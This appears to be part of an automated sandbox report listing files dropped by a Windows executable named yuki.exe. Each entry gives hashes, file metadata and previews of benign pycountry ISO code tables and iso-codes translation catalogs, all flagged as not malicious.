                                                                                                    Preview:COPYRIGHT (c) 2008 - 2023, pycountry..Pycountry is free software; you can redistribute it and/or modify.it under the terms of the GNU Lesser General Public License as published by.the Free Software Foundation; either version 2.1 of the License, or any later version...This project is distributed in the hope that it will be useful,.but WITHOUT ANY WARRANTY; without even the implied warranty of.MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the.GNU Lesser General Public License for more details...Contributors:.- Christian Theune (2008-2020, 2022).- Nate Schimmoller (2022-2023).- Zachary Ware (2016, 2023).- Alan Orth (2023).- Ashok Argent-Katwala (2020).- Bastien Vallet (2020).- Chris R Bunney 2020.- Christian Zagrodnick (2012-2013).- Christoph Zwerschke (2013).- Jakub Wilk (2020).- Janis Kirsteins (2019).- Justin Ryan Wagner 2014.- Kevin Deldycke (2014, 2016).- Louis Sautier (2020).- Lucas Wiman (2015).- Mario Vilas (2014).- Michael Howitz (2020).- Micha. Bielawski (2021, 2023)
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:JSON data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):17097
                                                                                                    Entropy (8bit):4.130742675608694
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:RWfT+Ws91dwhw8KMiRcHBe+5/Bjv+PvFqZEj34SmqMrZNFdNbXt7WRj/kLNjhECU:Anu1dwi7She+MvFqz77XokLNjWH7
                                                                                                    MD5:58CA117D7B1F54C981AE3A91BE61CD7A
                                                                                                    SHA1:9B1D19A1F562498A70EE066B738F64B6DF97AD92
                                                                                                    SHA-256:674D3DC8B18A3B999AF7196F779428A465E5FB0AF414D071957D10348BC9817E
                                                                                                    SHA-512:205FF58BEB4142A91FF91B8DFC685265C648F75B6B9B4CD3FD9EE053DC9777DFF168A03776D965328FEB4A21BE1E027153FD3F96DC1DEBAA5F92F818D48666CD
                                                                                                    Malicious:false
                                                                                                    Preview:{. "15924": [. {. "alpha_4": "Adlm",. "name": "Adlam",. "numeric": "166". },. {. "alpha_4": "Afak",. "name": "Afaka",. "numeric": "439". },. {. "alpha_4": "Aghb",. "name": "Caucasian Albanian",. "numeric": "239". },. {. "alpha_4": "Ahom",. "name": "Ahom, Tai Ahom",. "numeric": "338". },. {. "alpha_4": "Arab",. "name": "Arabic",. "numeric": "160". },. {. "alpha_4": "Aran",. "name": "Arabic (Nastaliq variant)",. "numeric": "161". },. {. "alpha_4": "Armi",. "name": "Imperial Aramaic",. "numeric": "124". },. {. "alpha_4": "Armn",. "name": "Armenian",. "numeric": "230". },. {. "alpha_4": "Avst",. "name": "Avestan",. "numeric": "134". },. {. "alpha_4": "Bali",. "name": "Balinese",. "numeric": "360". },. {. "alpha_4": "Bamu",. "name": "Bamum",. "numeric": "435". },
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:JSON data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):43284
                                                                                                    Entropy (8bit):4.386184791738287
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:MnW9dpyPubqxU06BoCgwLlYdMRlAURLeG:ScRX
                                                                                                    MD5:E606BF70C68AA1C976A9913F9A518DC3
                                                                                                    SHA1:E75B56ADD2C5BC92078F921EF4F0970EA4F579E5
                                                                                                    SHA-256:F01B812B57FBA9F31FF621BF33E7C7570A01964DBEB5BE2167E94DECF538C89F
                                                                                                    SHA-512:55DC6592079561A4CC3C7E4A336ADFA26AC7D07AA96818F5E95F2784F8505113A87C5BB12C118C2F96EE3BE2E8AD5C1E6D3A6314B80DFD1E0D0E34648F65B316
                                                                                                    Malicious:false
                                                                                                    Preview:{. "3166-1": [. {. "alpha_2": "AW",. "alpha_3": "ABW",. "flag": "....",. "name": "Aruba",. "numeric": "533". },. {. "alpha_2": "AF",. "alpha_3": "AFG",. "flag": "....",. "name": "Afghanistan",. "numeric": "004",. "official_name": "Islamic Republic of Afghanistan". },. {. "alpha_2": "AO",. "alpha_3": "AGO",. "flag": "....",. "name": "Angola",. "numeric": "024",. "official_name": "Republic of Angola". },. {. "alpha_2": "AI",. "alpha_3": "AIA",. "flag": "....",. "name": "Anguilla",. "numeric": "660". },. {. "alpha_2": "AX",. "alpha_3": "ALA",. "flag": "....",. "name": ".land Islands",. "numeric": "248". },. {. "alpha_2": "AL",. "alpha_3": "ALB",. "flag": "....",. "name": "Albania",. "numeric": "008",. "official_name": "Republic of Albania". },. {. "alpha_2":
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:JSON data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):498094
                                                                                                    Entropy (8bit):4.1895799315712186
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:jLeCHHgSCdPl29cOdDX9+HqaS88SbKzZWv/d/Pjo:jyCHASCdPY9/DX9+HqnXSWzZWXx0
                                                                                                    MD5:D1F55B49FB379B4CBEE3F133CFE8F42A
                                                                                                    SHA1:C3C1252EA313A2DBBBB9CA4EE223407B613BC135
                                                                                                    SHA-256:4DDDD6DC5EA7CC7DBA1EE289C659C94C61D45813F0E5F797363DE28BF3E8E29A
                                                                                                    SHA-512:1FE58998C022D39571BB585DC7BD0F4674E9E04D9EF17AFA003BCA60B90F46D4D7518FBCD242707192F96F7E54910FEF4E05117EA2A78809845F7DB89655C371
                                                                                                    Malicious:false
                                                                                                    Preview:{. "3166-2": [. {. "code": "AD-02",. "name": "Canillo",. "type": "Parish". },. {. "code": "AD-03",. "name": "Encamp",. "type": "Parish". },. {. "code": "AD-04",. "name": "La Massana",. "type": "Parish". },. {. "code": "AD-05",. "name": "Ordino",. "type": "Parish". },. {. "code": "AD-06",. "name": "Sant Juli. de L.ria",. "type": "Parish". },. {. "code": "AD-07",. "name": "Andorra la Vella",. "type": "Parish". },. {. "code": "AD-08",. "name": "Escaldes-Engordany",. "type": "Parish". },. {. "code": "AE-AJ",. "name": ".Ajm.n",. "type": "Emirate". },. {. "code": "AE-AZ",. "name": "Ab. Z.aby",. "type": "Emirate". },. {. "code": "AE-DU",. "name": "Dubayy",. "type": "Emirate". },. {. "code": "AE-FU",. "name": "Al Fujayrah",. "type": "Emirate". },. {.
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:JSON data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6193
                                                                                                    Entropy (8bit):4.48015328083314
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rSG73cDXbFr0IjXFz3fHG9wXcmDAUZUxg926wttHUU6VtUs92Dd92WeypZvOqUtg:uyuXWWtA0VtB+dmachNle7
                                                                                                    MD5:0960D396BD2C2CBE13E9049EA6C19674
                                                                                                    SHA1:423C07CCE12BA0FFABDA0B0FC620C1A5394058CB
                                                                                                    SHA-256:EB92D1CCE3E352559F610E60E2ACB23687EB1CF07B23675FB112863A5741A6FA
                                                                                                    SHA-512:2D97201FACB8C2E00933311AADFA4689DD64060E81472655DFA30D516538C6DF136F538777E9CB044AAC2A28A3B2CC021274C4F4DF4892B3714FD2F7DBCE9159
                                                                                                    Malicious:false
                                                                                                    Preview:{. "3166-3": [. {. "alpha_2": "AI",. "alpha_3": "AFI",. "alpha_4": "AIDJ",. "name": "French Afars and Issas",. "numeric": "262",. "withdrawal_date": "1977". },. {. "alpha_2": "AN",. "alpha_3": "ANT",. "alpha_4": "ANHH",. "comment": "had numeric code 532 until Aruba split away in 1986",. "name": "Netherlands Antilles",. "numeric": "530",. "withdrawal_date": "2010-12-15". },. {. "alpha_2": "BQ",. "alpha_3": "ATB",. "alpha_4": "BQAQ",. "name": "British Antarctic Territory",. "withdrawal_date": "1979". },. {. "alpha_2": "BU",. "alpha_3": "BUR",. "alpha_4": "BUMM",. "name": "Burma, Socialist Republic of the Union of",. "numeric": "104",. "withdrawal_date": "1989-12-05". },. {. "alpha_2": "BY",. "alpha_3": "BYS",. "alpha_4": "BYAA",. "name": "Byelorussian SSR Soviet Socialist Republic",. "numeric": "112",. "withdrawa
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:JSON data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):16584
                                                                                                    Entropy (8bit):4.118485376665358
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:BhEPzaCs4uCZ2CPR/d5DmhmyfqPAbvGl/DGOPtm+Q6Deh9XcMk3YP4dGb:BhdCX7Z2eZdRmhDKAbO5BsygMMJAE
                                                                                                    MD5:E5ADBCBEFB7871CF0E8E9ADF2F08C759
                                                                                                    SHA1:335BD1C77F6D49B576CF6D99AC6953DE6898FADC
                                                                                                    SHA-256:C9C37B426317809A6FFE067DA3A334A3150F42494FAE91823557AFB7BD1A4135
                                                                                                    SHA-512:3DB28153A745048FE0023BE023E261C4C7374A2B14969D0E265BD6F90750C72ACD248685CD1930771748CBD9DB821A41BB72A707F0D30CB0913E324362A481D9
                                                                                                    Malicious:false
                                                                                                    Preview:{. "4217": [. {. "alpha_3": "AED",. "name": "UAE Dirham",. "numeric": "784". },. {. "alpha_3": "AFN",. "name": "Afghani",. "numeric": "971". },. {. "alpha_3": "ALL",. "name": "Lek",. "numeric": "008". },. {. "alpha_3": "AMD",. "name": "Armenian Dram",. "numeric": "051". },. {. "alpha_3": "ANG",. "name": "Netherlands Antillean Guilder",. "numeric": "532". },. {. "alpha_3": "AOA",. "name": "Kwanza",. "numeric": "973". },. {. "alpha_3": "ARS",. "name": "Argentine Peso",. "numeric": "032". },. {. "alpha_3": "AUD",. "name": "Australian Dollar",. "numeric": "036". },. {. "alpha_3": "AWG",. "name": "Aruban Florin",. "numeric": "533". },. {. "alpha_3": "AZN",. "name": "Azerbaijan Manat",. "numeric": "944". },. {. "alpha_3": "BAM",. "name": "Convertible Mark",. "numeric
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:JSON data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):874782
                                                                                                    Entropy (8bit):3.832192998289297
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:iC/NS9SasGfSl6yJlC3UHymIqovtupRWdVnEQMYvhesr5h7syqfsO7BJwdcQD/4J:oEFYbbQt
                                                                                                    MD5:FEE34FA2C17582310BFF6B93A6F7893D
                                                                                                    SHA1:444C3995B44B7C256D0165D1842DA152AEFFA261
                                                                                                    SHA-256:9636CE5266053867627140CE5ADA1F9AA897CA07A7501302C1B14B8D1147CDDA
                                                                                                    SHA-512:4CC1300E25739C18A0500C5CD04822330E57D24525BFFF94637BB17C696721727A356175D17EB77AD088E6F2A19765603EF460D5BCFEDFFFB13878972370B604
                                                                                                    Malicious:false
                                                                                                    Preview:{. "639-3": [. {. "alpha_3": "aaa",. "name": "Ghotuo",. "scope": "I",. "type": "L". },. {. "alpha_3": "aab",. "name": "Alumu-Tesu",. "scope": "I",. "type": "L". },. {. "alpha_3": "aac",. "name": "Ari",. "scope": "I",. "type": "L". },. {. "alpha_3": "aad",. "name": "Amal",. "scope": "I",. "type": "L". },. {. "alpha_3": "aae",. "inverted_name": "Albanian, Arb.resh.",. "name": "Arb.resh. Albanian",. "scope": "I",. "type": "L". },. {. "alpha_3": "aaf",. "name": "Aranadan",. "scope": "I",. "type": "L". },. {. "alpha_3": "aag",. "name": "Ambrak",. "scope": "I",. "type": "L". },. {. "alpha_3": "aah",. "inverted_name": "Arapesh, Abu'",. "name": "Abu' Arapesh",. "scope": "I",. "type": "L". },. {. "alpha_3": "aai",. "name": "Arifama-Miniafia",. "scope": "I",.
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:JSON data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8486
                                                                                                    Entropy (8bit):3.9700015674324263
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:Ejkj5mAB/VVgPUOCFulVbmv5e37K9NnH2k:EjiJ9VVgK2bmLH
                                                                                                    MD5:6B5F7EAA676D315C8B4417D2650E72F5
                                                                                                    SHA1:FBA7E7E0ABC79359904169BFD596D5DF6A5A545A
                                                                                                    SHA-256:12CC06FF3ED95EB809174A686CB2AE73315F3CB16582CF6FE4267CE7A2AD6198
                                                                                                    SHA-512:85012685FF0B74FD7B7D43B090C0E6B9EB6DD27495E7E7AD821A94F8DCCBA9703FEC6DA4C433DE16A29A5498A59165960966DBE1C5581BA3AB26E5558EB17277
                                                                                                    Malicious:false
                                                                                                    Preview:{. "639-5": [. {. "alpha_3": "aav",. "name": "Austro-Asiatic languages". },. {. "alpha_3": "afa",. "name": "Afro-Asiatic languages". },. {. "alpha_3": "alg",. "name": "Algonquian languages". },. {. "alpha_3": "alv",. "name": "Atlantic-Congo languages". },. {. "alpha_3": "apa",. "name": "Apache languages". },. {. "alpha_3": "aqa",. "name": "Alacalufan languages". },. {. "alpha_3": "aql",. "name": "Algic languages". },. {. "alpha_3": "art",. "name": "Artificial languages". },. {. "alpha_3": "ath",. "name": "Athapascan languages". },. {. "alpha_3": "auf",. "name": "Arauan languages". },. {. "alpha_3": "aus",. "name": "Australian languages". },. {. "alpha_3": "awd",. "name": "Arawakan languages". },. {. "alpha_3": "azc",. "name": "Uto-Aztecan languages". },. {. "alpha_3": "bad
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_3166-1
                                                                                                    Category:dropped
                                                                                                    Size (bytes):528
                                                                                                    Entropy (8bit):5.318928648358197
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:i4r1xxLtt02Ukj/xtLLCw/4FR03XmBQWiOWRl:RTjt0U7Kw/tXmGRl
                                                                                                    MD5:B960B91D8FF9B37C41E9AAC109131B39
                                                                                                    SHA1:C281597638779D6AA47393B137CC9BCD30F9EE61
                                                                                                    SHA-256:937B8611C18CC9457DAFE2DBEF52CEA97AE82D0A7F221913021AF43C3DD4F5ED
                                                                                                    SHA-512:8990AE4F059C91931D149C4CD99ADCA2DFE3C61105638FEBD6BAEE806478475595185D445FC01051362EE66DD3CB5E08A2B46FA6F6442A0DEA87EF0E8F39EE9E
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8.......9................Project-Id-Version: iso_3166-1.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2017-12-25 21:46+0000.Last-Translator: Chris Leonard <cjlhomeaddress@gmail.com>.Language-Team: Abkhazian <https://hosted.weblate.org/projects/iso-codes/iso-3166-1/ab/>.Language: ab.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=2; plural=n != 1;.X-Generator: Weblate 2.19-dev..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_639-5
                                                                                                    Category:dropped
                                                                                                    Size (bytes):371
                                                                                                    Entropy (8bit):5.154022087662006
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ilijcYYxqZCt0vOuvP0NXzffGGXkk/RcximC3XAF5ITGi3XmBQ8KMW0YEi9:i4cxxq8t02Ukx/iximCg5ITf3XmBQWi9
                                                                                                    MD5:350DBE627717926E49768AE31416C9F6
                                                                                                    SHA1:BA36B0A2CC1250C40931B53C325705EE52AE97B1
                                                                                                    SHA-256:E466E8BBB33A91F0DCBCA4CDFAB8D868EE44873175F697884CE6C0295E060653
                                                                                                    SHA-512:F8508E42BB34E7591EF8310F81143751346FA58C4C470A35F60547E1BD8199E824D67F7E83E67EA468D19E037C3B2F0CFF7C8DFDD74EB3293849FACD63A9E9EA
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8...9...9................Project-Id-Version: iso_639-5.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE.Last-Translator: Automatically generated.Language-Team: none.Language: ab.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_3166-1
                                                                                                    Category:dropped
                                                                                                    Size (bytes):524
                                                                                                    Entropy (8bit):5.262749539581619
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:i49xxLtt02UkrW/xtLLPQ/4FzfsXmBQWiOWzBl:R/jt0UuXQ/asXmGzBl
                                                                                                    MD5:136E614EDB40F55F7C5ABD2D1DC44602
                                                                                                    SHA1:70504568753E8D8C65B63ED185988B2833758B6D
                                                                                                    SHA-256:E95926F2E5F2AB6E7F4908FFAF3B3E181A4D64F77C217280A10F5721F797A459
                                                                                                    SHA-512:618DB35CC664BBC490E468AE880DF2890564697D0D4EB6F32BD009C1BF8A9610C320B6D78B30ACACD1FE73A3BE59F8CB274952755DE19254CA7FA39366A3828B
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8.......9................Project-Id-Version: iso_3166-1.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2017-12-26 17:27+0000.Last-Translator: Chris Leonard <cjlhomeaddress@gmail.com>.Language-Team: Acehnese <https://hosted.weblate.org/projects/iso-codes/iso-3166-1/ace/>.Language: ace.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=1; plural=0;.X-Generator: Weblate 2.19-dev..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 212 messages, Project-Id-Version: iso_3166-1 'Apaghanicitan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9144
                                                                                                    Entropy (8bit):4.697906904467747
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:RiiXoeeolUBdwQsjT/aR6/ug09pVg80z1mivD+:RieJ+KJjzaE/ugUpViz1vD+
                                                                                                    MD5:FC1083F73CA919EAC242543EFCC4EE40
                                                                                                    SHA1:AEA083973AAA73E080330D4D78AB53DB686896B6
                                                                                                    SHA-256:DAEB1B8C3CC3A8C8196B34B013EBDD81CD3C4CEEDC82DBC2B6CA092F87C9277E
                                                                                                    SHA-512:D68CD7F9EE97D8060B770F9A84A09E11A40AD650665B1AC40961793D08BE28CE39F879DBC49D1AA72E328F4E6F1185BF6CAEC45D3B0C7C351142396D81E62ECF
                                                                                                    Malicious:false
                                                                                                    Preview:........................\.......................................................................................!.......)......./.......9.......A.......L.......T.......\.......g.......p.......x...............................................................................................................................(......./.......>.......W.......\.......b.......h.......y...............................................................................................................................#.......).......5.......G.......O.......W.......`.......n.......s.......{.......................................................................................................................................&.......-.......;.......B.......H.......Q.......[.......c.......k.......q.......{............................................................................................................................................... .......(...............<.......F.......Q.......\.......c.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 402 messages, Project-Id-Version: iso_3166-1 'Afghanistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):22487
                                                                                                    Entropy (8bit):5.008339607519126
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:imSxiJzN0cqGEoqWw5+d5wsOP4d0kAEKuEXG9crnZZCx+hNATVpE:8xiJz6ccymsOP4d0kAEE7ZMxaNATE
                                                                                                    MD5:5C08FAE5691C92BE1055E816B19E8A57
                                                                                                    SHA1:DF995D99447B5901C6573EDF410A7E56FF067625
                                                                                                    SHA-256:E15C5D7853376185C282D8DC77FA07459442B4EC25226F0E4891D9DBD52D5427
                                                                                                    SHA-512:9265A99B93BC34648AFDE737A0FC36478E5C46547ADE1284B9E9F05130BFA7CAE581FBD35CAA679B4CF4279702C41C162AA0DF859331A6D84E3820A9DF669168
                                                                                                    Malicious:false
                                                                                                    Preview:........................<........!.......!.......!.......!.......!.......!.......!.......!.......!.......!......."......*"......4"......G"......O"......U"......_"......g"......r"......z".......".......".......".......".......".......".......".......".......".......".. ....".......#......"#......+#......9#......@#......_#......v#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$......!$......*$......C$......_$......g$..%...m$.......$.......$.......$.......$.......$.......$.......$.......$.......$..%....$..,....%.."...A%..*...d%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......9&..'...G&..$...o&.......&.......&.......&.......&.......'......%'......*'......2'......9'......G'......X'......h'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(.......(.......(.......(...... (.......(......5(..!...;(......](......o(.......(......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 10 messages, Project-Id-Version: iso_3166-3 'Oos-Timor'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1001
                                                                                                    Entropy (8bit):5.19647318305491
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:Li7/HpXCTWULH3Q25t0UASxh+Rg3XmFRjX+ZJKS:Li7PWL1oUAUAgmFAJ9
                                                                                                    MD5:497861678533603AD103D5D96D367B20
                                                                                                    SHA1:46C209AEBB3107CB23062DBFAFF82B7B8202A9CE
                                                                                                    SHA-256:DECE78F315A094FC3E73EB33B22D953ED4AD240F5864C28DE6C90ADF0993E10E
                                                                                                    SHA-512:0B05BA0996B023A76B2D1B220698DDBE835943BBA2E1831BB7DA2D7E5B2344F5BB6C8B3C01D9E789733E17E8FC93FCAB7B05E7DAB014F6BAB30FA12D67F06FF6
                                                                                                    Malicious:false
                                                                                                    Preview:................l...............................................'.......<.......R...)...d...................}...........8.......B.......`.......q.................../............................................................................East Timor.German Democratic Republic.Johnston Island.Netherlands Antilles.Serbia and Montenegro.Southern Rhodesia.USSR, Union of Soviet Socialist Republics.Upper Volta, Republic of.Zaire, Republic of.Project-Id-Version: iso_3166-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2007-11-17 11:40+0200.Last-Translator: Friedel Wolff <friedel@translate.org.za>.Language-Team: Afrikaans <translate-discuss-af@lists.sourceforge.net>.Language: af.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit..Oos-Timor.Duitse Demokratiese Republiek.Johnston-Eilande.Nederlands-Antille.Serwi. en Montenegro.Suid-Rhodesi..USSR, Unie van Sowi.t Sosialistiese Republieke.Bo-Volta.Za.re
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 130 messages, Project-Id-Version: iso_639-3 'Abgasies'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5414
                                                                                                    Entropy (8bit):4.6008216093853465
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:wQE7o5DIfuFHwYsTDO2qNu+Y0pwKz19MG+gaB719x05bzxcMJ:wQEsh2t1OpNQKz1eB7zwzxcO
                                                                                                    MD5:8D90C322A8101CB2A82649A9014376A0
                                                                                                    SHA1:82EFD431E9631494760E2F02E376BF35A1F1D7E6
                                                                                                    SHA-256:16612EFB6898F60EF4D152EFAEE0FC2D510622E1E87E3C6E51A48597B380493F
                                                                                                    SHA-512:045AF8EBDB81471F1EFE008EB8855DE28B86A54F946FA12F829172A5FAC18BD7A108515EC0AC02CFC88C85674C83F15674E36BC6FC1F61AE851CBC53FD0E4870
                                                                                                    Malicious:false
                                                                                                    Preview:................,.......<...............................................................".......+.......4.......;.......G.......N.......Y.......a.......i.......p.......z.......................................................................................................................................................................#.......,.......3.......:.......B.......K.......Q.......Z.......a.......g.......q.......{...............................................................................................................................................................$......./.......9.......>.......F.......K.......Q.......Y.......c.......v.......|.......................................................................................................................................................%.......,.......<.......D.......N.......T.......\.......d.......j.......p.......v.......}...............................................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_3166-1
                                                                                                    Category:dropped
                                                                                                    Size (bytes):522
                                                                                                    Entropy (8bit):5.297164375884388
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:i4h1xxLtt02UknF//xtLLGq/4FmLXmBQWiOWjl:Rhnjt0Uteq/3XmGjl
                                                                                                    MD5:FF23F6CD19366D89E1D412EF1B2D254D
                                                                                                    SHA1:53E3EBFB94CC9A3D386F46614F2B0B2255353C2B
                                                                                                    SHA-256:1DF290323B16856F4D8BB69CF67A9E4334AB3837BF20EF586FB3B9C975B1C259
                                                                                                    SHA-512:23160D39C937B7EF88E4576A4B5C145BEF04D7E54240B921772D8F56CDC04912AC1518126CF2D8E6DFFFB6729B754F6D0219B0F1CBCC9416214AA9F9E08AE92E
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8.......9................Project-Id-Version: iso_3166-1.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2017-12-25 21:08+0000.Last-Translator: Chris Leonard <cjlhomeaddress@gmail.com>.Language-Team: Akan <https://hosted.weblate.org/projects/iso-codes/iso-3166-1/ak/>.Language: ak.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=2; plural=n > 1;.X-Generator: Weblate 2.19-dev..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 123 messages, Project-Id-Version: iso_3166-1 '\341\214\220\341\210\224\341\211\243\341\212\222\341\215\242'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6413
                                                                                                    Entropy (8bit):5.1032722532504025
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:6rcfLwy5VKFVZDThoY3l7AlzAh2JPM5DHC:6skaoFV3l3l7AlLNM5DHC
                                                                                                    MD5:7C182C40D80A36252511997B1ABBE25D
                                                                                                    SHA1:EF20E5B7497CEB4DF73D254833DA53E2513CFB39
                                                                                                    SHA-256:DE3B22D6226C7ED85DBF19260AFD5586F1CECE90DE87EE06CF2842134A9399B5
                                                                                                    SHA-512:FDEA8AC807AFDC5AAD916FEBCB59AD429568497ED40864E24B7AFC317BC674E3E7F92C5C3DAAF38983173686A0A865D82CD2790F670E3F7081E04B1E4CC3F7AE
                                                                                                    Malicious:false
                                                                                                    Preview:........{.......................h.......i.......q.......y.......................................................................................................................................................(.......A.......F.......L.......R.......[.......c.......i.......q.......x.......................................................................................................................!.......).......1.......8.......?.......M.......T.......Z.......d.......l.......t.......z...........................................................&...........................................................................".......-.......7.......>.......^.......g.......o.......w.......}.......................................................................................................................................+.......1.......;.......A.......H.......T.......i.......t...............................................................................................(.......=.......L.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 2 messages, Project-Id-Version: iso_3166-3 '\341\212\224\341\215\210\341\210\264\341\210\222\341\212\225\341\215\245\341\210\265 \341\214\220\341\212\225\341\211\262\341\210\224\341\210\265'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):476
                                                                                                    Entropy (8bit):5.395480240945663
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ilVWIlTa9NNGYxA9Ct0vOuvP0NXzffUWU//R1iMA2KMiRlF2AFQmWXmBQ8KMW0Yl:iXQ1xjt02Ukc/Ki4FL3WXmBQWimRw
                                                                                                    MD5:A5CA220438A3466E1906B666DE2C72D0
                                                                                                    SHA1:2DFD561FB82492E8F4018E09A157440F950E199E
                                                                                                    SHA-256:BF2C3A0B0AB749038858FEA00D123479EC5EA32751D01DC6AA2AD4C5EFADE35F
                                                                                                    SHA-512:FEB8F7102D4F9C29FEF3569DD2FC77F92DB8C8697CD2BB2DD4E59BB809631E6FFE3A4EF8D58EE04E600F18595CA9BF6FCEFBF02118ED76A925C809BE3834DE5D
                                                                                                    Malicious:false
                                                                                                    Preview:................,.......<.......P.......Q...O...f...%............................Netherlands Antilles.Project-Id-Version: iso_3166-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2004-04-07 08:00+0100.Last-Translator: Alastair McKinstry <mckinstry@debian.org>.Language-Team: Amharic.Language: am.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit......... ......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 120 messages, Project-Id-Version: iso_639-3 '\341\212\240\341\211\245\341\210\220\341\213\232\341\212\233'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5797
                                                                                                    Entropy (8bit):4.930590372753605
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:eQGmdpU6/pkUjoaCp/vmnEKbpJ95MQ+/sk2pL5lsx2OrtZFjVoEP0GCuk:eQGmd+5KymnEKD9q4lIkOrtZFjnMuk
                                                                                                    MD5:293268BF59BB1567A14CDF2A9E9D3D6A
                                                                                                    SHA1:18E0EEBD7B940398E4AAC05EB4F21B574DC446A7
                                                                                                    SHA-256:C85D7239D881068D69C0E32D03C44251F1ACFEB31FC15E68314740E69DB77538
                                                                                                    SHA-512:CD0193F0D07C5521681773D69E36B97E3BC510980F15B276FDDF1C0386D250F998D0AE4EA7F825802A4D131AB72CF0A8F7482B014A3F5BD7CA1FB508B40D6C54
                                                                                                    Malicious:false
